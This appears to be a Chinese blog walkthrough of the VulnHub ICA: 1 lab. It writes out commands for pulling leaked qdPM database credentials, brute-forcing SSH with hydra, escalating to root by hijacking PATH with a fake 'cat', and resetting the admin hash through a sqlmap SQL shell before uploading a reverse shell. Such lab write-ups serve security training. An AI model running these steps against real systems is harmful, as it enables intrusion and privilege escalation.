Vulnhub靶场 渗透测试实战10:ICA: 1

最新推荐文章于 2023-08-05 09:45:41 发布
最新推荐文章于 2023-08-05 09:45:41 发布
阅读量732 收藏 2
点赞数 3
分类专栏: VulnHub靶场 文章标签: 安全 web安全 mysql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60329350/article/details/128075706
版权

靶场下载:https://download.vulnhub.com/ica/ica1.zip

一: VirtualBox导入,网络模式桥接。

 

 二:信息收集。

 1;服务端口开放。80端口是一个登录框。

 2;目录遍历一波。存在信息泄露,存在一个数据库和一个qdPM9.2管理软件的web登录框。

 三;枚举漏洞——找找这个版本存不存在漏洞。

searchsploit qdpm 9.2 搜索漏洞

locate 50854.txt 查看目录

cat /usr/share/exploitdb/exploits/php/webapps/50854.txt 查看提示

wget http://192.168.1.74/core/config/databases.yml

 1;提示我们passwd.mysql:qdpmadmin/UcVQCMQk2STVeS6J。

 2;登录数据库。把库里的用户名和密码保存下来爆破。base64 解密一下密码。

 mysql -u qdpmadmin -h 192.168.1.74 -p

show databases;

use staff

show tables;

 3;用户名成小写。

hydra -L user.txt -P passwd.txt ssh://192.168.1.74

在线工具:CyberChef

 四;漏洞利用。

1;第一个falg.

 2;en?提示说,存在可执行文件。

It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

在我看来,在访问系统时有一个弱点。 据我所知,可执行文件的内容是部分可见的。 我需要找出是否存在漏洞。

find / -perm -u=s 2>/dev/null

strings /opt/get_access 转换一下字符串

 五:提权,权限提升。

1;发现会以root权限查看文件,那我们可以通过伪造一个文件名为cat的可执行文件,文件内容为/bin/bash,并将文件路径设置为环境变量,这样执行get_access的时候,就会执行我们伪造的cat文件,从而使我们获得root权限:

ehco '/bin/bash' > cat写入一个假的 cat 文件

chmod +X cat  为 cat 赋予执行权限
 
export PATH=.:$PATH 将当前目录写入到环境命令

/opt/get_access  最后执行命令,提权。

 

 六:第二种提权方法;web界面数据库配置-重新安装数据库-更改管理员密码。

1;访问url,用泄露的账号密码登录数据库。安装数据库。qdPM 9.1 安装icon-default.png?t=M85Bhttp://192.168.1.74/install/index.php?step=database_config

 2;进去之后,让你更新一下管理员密码。保存成功之后跳转到管理员界面登录。

 管理员的信息存储在qdpm下的 configuration表中,密码是app_administrator_password的值,可以去把源码下载下来看一下。

sqlmap -d mysql://qdpmadmin:UcVQCMQk2STVeS6J@192.168.1.74:3306/qdpm -f --banner 
--sql-shell #sqlmap执行sql命令
UPDATE configuration set value="$P$E.iWYDCN28TAZXVGaQYb24opsdS3WN0"  where  id =2;
#更改一下管理员的密码

 2;有一个文件上传的点。

 3;上传文件,虽然报错,但是上传成功了。那接下来,我们就上传个shell。

 4;上传shell,反弹监听。

 5;监听成功窝窝窝,然后,提升一下bash;接下来就回到第四大点的第二点开始咯!我就不继续了喔。

python -c "import pty;pty.spawn('/bin/bash')"

 

 总结;

1;qdPM9.2管理软件的版本漏洞,找到MySQL数据库账号密码。

2;qdPM9.2管理软件的web界面数据库配置漏洞及文件上传反弹shell漏洞。

3;利用文件权限设置环境变量提权。

学安全的杨咩咩
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
qdPM_9.1(基于Web的项目管理工具).zip
03-25
qdPM-基于Web的项目管理工具 qdPM是一个基于Web的免费项目管理工具,适用于从事多个项目的小型团队。它是完全可配置的。您可以轻松管理项目,任务和人员。客户使用集成到任务中的票证系统进行交互。与php 5.4+和php 7.0+兼容 特征 可配置的项目类型,例如固定价格,支持,内部 可配置的任务状态,例如打开,关闭,批准 可配置的用户,包括组访问控制 项目,任务和用户的无限额外字段 不同的计费类型,例如每小时,固定价格,免费 多个项目/任务 使用项目和任务过滤器的多个任务视图 强大的报告模块,包括自定义报告生成器 以XLS格式导出任务 客户支持票证链接到任务,方便客户互动 日历 多种语言 完全可配置 皮肤和颜色主题
ICA联盟:ICA数据标准平台产品白皮书.pdf
11-13
物联网作为当下推动人类社会科技、经济发展的新兴产业,给我们带来巨大的想象空间和商业机会,也极大促进了科技进步。物联网的应用已布设在随处可见的生活细节中,涵盖安防、电力、交通、物联、医疗、教育、环保、...
ICA: 1 靶场详细教学
weixin_60374959的博客
11-29 931
靶场前期考验的是我们的信息收集能力,通过信息收集找到一个框架的漏洞,再通过该漏洞进入数据库,找到远程连接ssh的账号密码,通过hydra爆破确认账号密码,内网部分是通过信息收集,主要是通过靶场给的提示去进一步找到文件,然后通过自己创建一个具有权限的文档,达到提权的目的。(有能力的小伙伴可以跟我小编的概述先自己去做一遍,不懂得再去看提升可能会更大哦!)
vulnhub——ica1.ova
最新发布
m0_62146983的博客
08-05 124
题目来源:Vulnerable By Design ~ VulnHub 题目:ica1.ova
靶机渗透练习66-ICA
hirak0的博客
04-20 793
靶机描述 靶机地址:https://www.vulnhub.com/entry/ica-1,748/ Description According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We
doubletrouble靶机之隐写术、脏牛漏洞提权、GTFObins提权、qdPM 9.1CMS漏洞利用
qq_40898302的博客
05-09 499
给exp添加一个执行权限,运行exp会让输入一个密码,然后生成一个firefart的用户,就可以使用这个用户和刚设置的密码以root权限登录服务器。真实环境中需要将/tmp/passwd.bak文件copy回原来的/etc/passwd进行替换。在提取出来的文件内发现了邮箱和一个字符串,尝试到登录后台。通过查看知道图片可以隐写4.7k的信息,并且存在密码。下载Deb格式的 StegSeek(需要用翻墙代理)查看网页源码发现使用qdPM 9.1CMS框架。代码缩进存在问题,进行修复。secret : 秘密。
itinfracservices:ICA0002-Ansible实验室
05-28
ICA0002 这些是 2019的实验室解决方案。
MySARAssist:ICA的移动伴侣应用程序
04-04
MySARAssist ICA的移动伴侣应用程序
bbb-sanity-commercelayer:ICA Commerce Layer Starter
03-18
bbb-sanity-commercelayer:ICA Commerce Layer Starter
适合:Fusion ICA工具箱(MATLAB)
02-04
适合Fusion ICA工具箱(MATLAB) FIT是Matlab工具箱,它实现联合ICA,并行ICA和CCA-Joint ICA方法。 NIH在项目1RO1EB005846中提供了支持,而NSF-SEI在NSF0612076中获得了Vince Calhoun博士和Tulay Adali博士的支持。...
vulnhub靶场ICA: 1打靶记录
Bruce_lake的博客
04-22 183
靶机,你勾起了我的兴趣。从数据库里一通翻找,在staff数据库里找到一个login表和user表,user表里有人名应该是用户,可为啥login表里的数据都带着两个等号!成,知道盐值放哪了,下载下来看看。第一反应,找到登录该产品的账号密码看看能不能从后台getshell,从qbms的configuration表中看见账号密码,账号是admin@localhost.com。好吧,mysql 的密码都是用SHA-256加密才存储的,这个我还是知道的。可以,某歌,我愿称你为最强,轻易做到了某度做不到的事情。
vulnhub doubletrouble: 1
箭雨镜屋
04-23 3136
渗透思路:nmap扫描----gobuster扫描网站目录----stegseek爆破图片隐写密码,获得网站用户密码----利用qdPM 9.1远程命令执行(任意文件上传)漏洞getshell----awk sudo提权
vulnhub-TED靶场过程记录
m0_59598029的博客
01-31 136
靶场地址:https://download.vulnhub.com/ted/Ted.7z靶场设置 使用VM打开扫描靶场网段,得到ip地址访问网址是个登陆框扫描目录无果后,开始对登录框进行探索。随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下看来密码是admin没错了,然后应该是hash加密后访问。这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受)这里使用的是sha256加密,然后加密的字符串,字符转换大写在在线网站进行大小写转换一发入魂获得下一步提示。
【甄选靶场Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
人间体佐菲的博客
10-22 450
【甄选靶场Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
vulnhub之ICA1靶机
lionwerson的博客
11-24 3019
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机: 2.nmap扫描一下端口: nmap 192.168.0.11 -p- 有80端口和22端口,先从web端入手: 是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下: python sqlmap.py -r 1.txt 不过好像不存在sql注入,只能另辟蹊径,这个是一..
安全vulnhub实验ica1
qq_43017750的博客
12-22 3595
查看当前网卡ip ┌──(kali㉿kali)-[~] └─$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255 inet6 fe80::20c:29ff:feea:9e42 prefixlen 64 scopeid 0x20<lin
vulnhub靶机_DOUBLETROUBLE: 1
学术渣渣的博客
09-14 3177
文章目录靶机介绍渗透过程获取ip端口扫描网站目录扫描图片隐写数据提取登录网站qdPM漏洞利用提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/doubletrouble-1,743/ 难度:简单 描述:get flags 渗透过程 获取ip 靶机IP为192.168.1.113。 arp-scan -l 端口扫描 nmap -A -T4 -p 1-65535 192.168.1.113 靶机开放了22和80端口。 网站目录扫描 首先对网站的特殊文件进行扫描。 dir
php2008上传漏洞,qdPM v7任意PHP文件上传漏洞
weixin_33746833的博客
03-24 133
发布日期:2012-09-25更新日期:2012-11-05受影响系统:qdpm qdpm 7qdpm qdpm描述:--------------------------------------------------------------------------------qdPM是免费的开源的基于Web的项目管理工具。qdPM v7的用户配置文件的照片上传功能可被利用上传任意文件到受害者服务...
《Vulhub-DC-1靶场实战
weixin_47118413的博客
07-06 2156
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
请用python实现以下功能:用ICA算法给脑电数据分离伪迹
05-05
为了实现这个功能,我们需要使用Python中的ICA算法库。在这里,我们将使用 `scipy` 库中的 `fastica` 函数来实现这个功能。 首先,我们需要导入所需的库和数据。在这里,我们将使用一个名为 `EEG_data.csv` 的文件,其中包含脑电数据。 ```python import numpy as np from scipy import signal from scipy.io import loadmat from scipy.linalg import svd from sklearn.decomposition import FastICA import csv with open('EEG_data.csv', newline='') as csvfile: data = list(csv.reader(csvfile)) data = np.array(data, dtype=float) ``` 现在,我们将使用 `FastICA` 函数将数据分离成独立的成分。 ```python ica = FastICA(n_components=14, random_state=0) ica.fit(data.T) IC = ica.components_ S = ica.transform(data.T) S = S.T ``` 在这里,我们将使用 `n_components` 参数来指定我们要分离的成分数量。我们还可以使用 `random_state` 参数来确保每次运行算法时得到相同的结果。 现在,我们可以将分离后的成分保存到文件中。 ```python with open('ICA_results.csv', 'w', newline='') as csvfile: writer = csv.writer(csvfile) for row in S: writer.writerow(row) ``` 现在,我们已经成功地使用ICA算法将脑电数据分离出来了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值